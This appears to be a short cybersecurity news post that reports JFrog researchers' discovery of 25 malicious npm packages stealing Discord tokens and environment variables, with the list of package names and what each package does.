Researchers Andrey Polkovnychenko and Shachar Menashe reported that ,” lemaaa as a library that is supposed to be used by threat actors to influence Discord accounts. When used in a specific way, the library will hijack the secret Discord token provided to it in addition to performing the utility function requested.

According to DevOps security firm JFrog, who attributed the packages to novice malware writers. The libraries used different techniques to imitate legal packages such as colors.js, crypto-js, discord.js, marked, and noblox.js,  After two months 17 identical packages were taken down, another batch of 25 malicious JavaScript libraries has made its way to the official NPM package registry with the objective of obtaining Discord tokens and environment variables from infected PCs.

Markedjs and crypto-standarts are two malicious packages that stand out for their role as duplicate trojan packages in that they completely replicate the original functionality of well-known libraries marked and crypto-js, but include additional malicious code that can remotely inject arbitrary Python code.

Environment variables, which are kept as key-value pairs on the development computer, are used to save information about the programming environment, such as API access tokens, authentication keys, API URLs, and account names.

The complete list of packages is below –

  • node-colors-sync (Discord token stealer)
  • color-self (Discord token stealer)
  • color-self-2 (Discord token stealer)
  • wafer-text (Environment variable stealer)
  • wafer-countdown (Environment variable stealer)
  • wafer-template (Environment variable stealer)
  • wafer-darla (Environment variable stealer)
  • lemaaa (Discord token stealer)
  • adv-discord-utility (Discord token stealer)
  • tools-for-discord (Discord token stealer)
  • mynewpkg (Environment variable stealer)
  • purple-bitch (Discord token stealer)
  • purple-bitchs (Discord token stealer)
  • noblox.js-addons (Discord token stealer)
  • kakakaakaaa11aa (Connectback shell)
  • markedjs (Python remote code injector)
  • crypto-standarts (Python remote code injector)
  • discord-selfbot-tools (Discord token stealer)
  • discord.js-aployscript-v11 (Discord token stealer)
  • discord.js-selfbot-aployscript (Discord token stealer)
  • discord.js-selfbot-aployed (Discord token stealer)
  • discord.js-discord-selfbot-v4 (Discord token stealer)
  • colors-beta (Discord token stealer)
  • vera.js (Discord token stealer)
  • discord-protection (Discord token stealer)

Threat actors have discovered that Discord tokens are a beneficial way to get illegal access to accounts without a password, allowing them to use the access to spread malicious links over Discord channels. This technique can be useful for stealing tokens created while logging into the Discord website using a web browser rather than the Discord app (which saves the token to local disc storage).

Finally the researchers concluded that ,”  it appears that beginner hackers are still abusing npm with the purpose of high ROI attacks, due to the little work involved in generating and releasing a malicious package. We assume this tendency to continue, given that our npm scanners continue to detect tens of new malicious packages every day.”

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s